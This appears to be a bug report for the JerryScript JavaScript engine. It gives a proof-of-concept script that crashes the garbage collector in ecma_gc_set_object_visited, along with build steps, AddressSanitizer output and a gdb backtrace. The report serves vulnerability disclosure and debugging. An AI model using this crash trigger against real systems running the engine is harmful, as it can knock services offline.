Memory corruption in ecma_gc_set_object_visited (jerry-core/ecma/base/ecma-gc.c:85)

[nszetei]

JerryScript revision

7a20150

Build platform

Ubuntu 18.04.4 LTS (Linux 4.15.0-91-generic x86_64)

and

ProductName: Mac OS X
ProductVersion: 10.15.4
BuildVersion: 19E287

Build steps

python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--strip=off --logging=on \
--compile-flag=-fsanitize=address --stack-limit=15

python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--error-messages=on --debug --strip=off --logging=on \
 --compile-flag=-fsanitize=address --stack-limit=15

Test case

• to reproduce the bug for this PoC, keep the same filename length and run the interpreter providing the basename only, as in the Execution steps below.

• filename: 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js'

function main() {
var v2 = [1337];
var v3 = [13.37,v2];
var v7 = 0;
while (v7 < 6) {
    var v10 = [13.37,13.37,"object"];
    var v14 = [13.37];
    var v16 = [v14,v10];
    var v17 = {e:1337,__proto__:v16,valueOf:-9007199254740991,toString:WeakSet};
    var v19 = [Int8Array,v17];
    var v21 = new Map(v19);
    var v22 = v3.unshift(0);
}
}
main();

Execution steps

~/jerryscript-test/build/bin/jerry xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js
ASAN:DEADLYSIGNAL
=================================================================
==15897==ERROR: AddressSanitizer: SEGV on unknown address 0x55e63e629888 (pc 0x55e6393d7f9d bp 0x000004e7ffe3 sp 0x7fff9494ba70 T0)
==15897==The signal is caused by a READ memory access.
    #0 0x55e6393d7f9c in ecma_gc_set_object_visited /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:85
    #1 0x55e6393d7707 in ecma_gc_mark_map_object /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:330
    #2 0x55e6393d7707 in ecma_gc_mark /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:594
    #3 0x55e6393d88a4 in ecma_gc_run /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:1395
    #4 0x55e6393d15bd in jmem_heap_realloc_block /home/jerryscript-test/jerry-core/jmem/jmem-heap.c:539
    #5 0x55e6393d9da4 in ecma_collection_push_back /home/jerryscript-test/jerry-core/ecma/base/ecma-helpers-collection.c:140
    #6 0x55e6393f13ee in ecma_op_internal_buffer_append /home/jerryscript-test/jerry-core/ecma/operations/ecma-container-object.c:71
    #7 0x55e6393f13ee in ecma_op_container_set /home/jerryscript-test/jerry-core/ecma/operations/ecma-container-object.c:790
    #8 0x55e6393ea3cf in ecma_builtin_dispatch_routine /home/jerryscript-test/jerry-core/ecma/builtin-objects/ecma-builtins.c:1115
    #9 0x55e6393ea3cf in ecma_builtin_dispatch_call /home/jerryscript-test/jerry-core/ecma/builtin-objects/ecma-builtins.c:1139
    #10 0x55e6393f6491 in ecma_op_function_call /home/jerryscript-test/jerry-core/ecma/operations/ecma-function-object.c:1085
    #11 0x55e6393f0ec4 in ecma_op_container_create /home/jerryscript-test/jerry-core/ecma/operations/ecma-container-object.c:516
    #12 0x55e6393ea525 in ecma_builtin_dispatch_construct /home/jerryscript-test/jerry-core/ecma/builtin-objects/ecma-builtins.c:1180
    #13 0x55e63942fb2e in opfunc_construct /home/jerryscript-test/jerry-core/vm/vm.c:849
    #14 0x55e63942fb2e in vm_execute /home/jerryscript-test/jerry-core/vm/vm.c:4151
    #15 0x55e63942ff2c in vm_run /home/jerryscript-test/jerry-core/vm/vm.c:4232
    #16 0x55e6393f4ffd in ecma_op_function_call_simple /home/jerryscript-test/jerry-core/ecma/operations/ecma-function-object.c:886
    #17 0x55e6393f6491 in ecma_op_function_call /home/jerryscript-test/jerry-core/ecma/operations/ecma-function-object.c:1085
    #18 0x55e63942ee5b in opfunc_call /home/jerryscript-test/jerry-core/vm/vm.c:764
    #19 0x55e63942ee5b in vm_execute /home/jerryscript-test/jerry-core/vm/vm.c:4130
    #20 0x55e63942ff2c in vm_run /home/jerryscript-test/jerry-core/vm/vm.c:4232
    #21 0x55e6393d3b9d in jerry_run /home/jerryscript-test/jerry-core/api/jerry.c:595
    #22 0x55e6393cf64d in main /home/jerryscript-test/jerry-main/main-unix.c:759
    #23 0x7fa01742eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #24 0x55e6393d1969 in _start (/home/jerryscript-test/build/bin/jerry+0x1a969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:85 in ecma_gc_set_object_visited
==15897==ABORTING

~/jerryscript-asan-debug/build/bin/jerry xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js
ICE: Assertion '((jmem_cpointer_t) uint_ptr) == uint_ptr' failed at /home/jerryscript-asan-debug/jerry-core/jmem/jmem-allocator.c(jmem_decompress_pointer):219.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)

Backtrace

$ gdb -nx -q ~/jerryscript-test/build/bin/jerry -ex 'r xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js'
Reading symbols from /home/jerryscript-test/build/bin/jerry...done.
Starting program: /home/jerryscript-test/build/bin/jerry xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x0000555555574f9d in ecma_gc_set_object_visited (object_p=0x55555a7c6888) at /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:85
85        if (object_p->type_flags_refs >= ECMA_OBJECT_NON_VISITED)
(gdb) x/i $rip
=> 0x555555574f9d <ecma_gc_set_object_visited+35>:      mov    (%rdi),%ax
(gdb) x/g $rdi
0x55555a7c6888: Cannot access memory at address 0x55555a7c6888